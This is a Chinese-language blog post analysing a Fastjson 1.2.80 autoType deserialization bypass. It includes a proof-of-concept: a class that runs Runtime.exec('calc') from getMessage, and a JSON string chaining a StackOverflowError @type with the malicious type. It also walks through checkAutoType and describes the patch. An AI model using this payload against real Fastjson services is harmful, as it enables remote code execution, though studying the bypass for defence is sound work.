Fastjson 1.80绕过分析
简介
Fastjson是一个Java库,可用于将Java对象转换为其JSON表示形式, 也可以用于将JSON字符串转换为等效的Java对象;
FastJson可以使用任意Java对象,包括您没有源代码的预先存在的对象;Fastjson提供了反序列化功能,允许用户在输入JSON串时通过@type键对应的value指定任意反序列化类名;
实验Poc
pom.xml:
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.80</version>
</dependency>
自定义一个恶意类模拟实际业务中的类:
import java.io.IOException;
public class EvilPayload extends Error {
private String domain;
public EvilPayload() {
super();
}
public String getDomain() {
return domain;
}
public void setDomain(String domain) {
this.domain = domain;
}
@Override
public String getMessage() {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException e) {
return e.getMessage();
}
return super.getMessage();
}
}
poc:
import com.alibaba.fastjson.JSON;
public class Main {
public static void main(String[] args) {
try {
String text1 = "{\"@type\":\"java.lang.StackOverflowError\", \"@type\":\"EvilPayload\",\"domain\":\"calc\"}";
System.out.println(text1);
JSON.parseObject(text1);
} catch (Exception e) {
e.printStackTrace();
}
}
}
分析
当需要反序列化的字符串中包含@type时, 会进入checkAutoType函数进行检测判断, 其中会有一个TypeUtils.getClassFromMapping(typeName);检测@type后面的类是不是mapping中缓存类(类似白名单的意思):
这个mapping当中包含一些异常类, 也就是说如果@type后面的类包含这里的应该异常类的话, 就会正常返回一个clazz:
然后会进入ThrowableDeserializer类当中进行反序列化, 如果字符串后面还有@type的话就会继续进行判断, 并且此时会带上expectClass:
此时的expectClass就是Throwable.class, 然后再次进入checkAutoType函数当中判断, 此时由于expectClass就是Throwable.class所以会绕过检测, 将expectClassFlag置为true:
最终通过检测会返回clazz, 也就是我们的恶意类:
之后就会去解析我们的恶意类(EvilPayload)了;
补丁
而在1.83版本的修补中, 最直接的地方就是判断clazz如果是异常类就直接将clazz置为null了:
总结
Fastjson会根据@type后面的类的类型,选择相应的类去反序列化:
比如这里我们的类EvilPayload和java.lang.StackOverflowError是继承的Throwable, 所以会进入ThrowableDeserializer进行处理;
AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。
更多推荐



所有评论(0)